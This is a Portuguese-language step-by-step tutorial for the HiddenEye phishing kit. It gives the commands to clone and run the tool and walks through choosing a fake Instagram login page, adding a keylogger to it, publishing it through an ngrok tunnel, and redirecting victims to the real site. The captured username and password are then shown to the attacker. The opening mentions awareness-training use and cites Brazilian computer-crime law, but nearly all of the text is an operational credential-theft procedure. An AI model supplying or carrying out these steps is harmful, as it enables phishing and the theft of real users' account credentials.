O Hidden Eye é uma plataforma de phishing que pode ser utilizada em um programa de conscientização sobre segurança da informação, porém também pode ser utilizada por pessoas mal intencionadas.
Projeto : github.com/DarkSecDevelopers/HiddenEye
Como previsto na Lei 12.737/2012 no Art. 154-A. Invadir dispositivo informático alheio, conectado ou não à rede de computadores, mediante violação indevida de mecanismo de segurança e com o fim de obter, adulterar ou destruir dados ou informações sem autorização expressa ou tácita do titular do dispositivo ou instalar vulnerabilidades para obter vantagem ilícita:
Pena – detenção, de 3 (três) meses a 1 (um) ano, e multa.(Lei Nº 12.737, de 30 de novembro de 2012).
Realize o download do Hidden Eye e liste o conteúdo do diretório:
Linuxgit clone https://github.com/TermuxHackz/HiddenEye cd HiddenEye/ ls

Realize a instalação dos pré-requisitos para o funcionamento do Hidden Eye.
Linuxpip3 install -r requirements.txt

Atribua a permissão de execução no script HiddenEye.py.
Linuxchmod +x HiddenEye.py

Execute o script HiddenEye.py.
Linux./HiddenEye.py Em seguida responda a pergunta: y = Sim, n = Não Você concorda em usar essa ferramenta apenas para fins educacionais? (y / n) HiddenEye >>> y

Informe qual o modelo de phishing que você deseja utilizar.
LinuxHiddenEye >>>

Para este exemplo optei em utilizar o modelo do [ 8 ] Instagram.
LinuxHiddenEye >>> 8

Selecione um modo de operação.
Para este exemplo estou utilizando o modo padrão :
Linux[ 1 ] Standard Instagram Web Page Phishing HiddenEye >>> 1

Você pode adicionar um Keylogger na página :
LinuxVOCÊ QUER ADICIONAR UM KEYLOGGER NA PÁGINA DE PHISHING – (Y/N) YOUR CHOICE >>> Y

Você deve informar um site para customizar o redirecionamento após a vítima inserir os dados.
LinuxREDIRECT HERE>>> www.instagram.com

Seleciona um dos servidores disponíveis, Ngrok ou Serveo.
Linux[1]Ngrok [2]Serveo HiddenEye >>> 1

O servidor foi inciado e o endereço do phishing foi gerado:
Linuxhttps://5465aea9.ngrok.io

Assim que o usuário acessa o link: https://5465aea9.ngrok.io ele visualiza uma página falsa do Instagram.

Assim que a vítima preencher os campos do formulário os dados serão enviados para o atacante.

Como definido no passo 09 após preencher o formulário de login a vítima é redirecionada para o site oficial do Instagram (www.instagram.com).

Como pode ver os dados digitados no formulário são exibidos para o atacante.
Usuário : 100security
Senha : P@ssw0rd
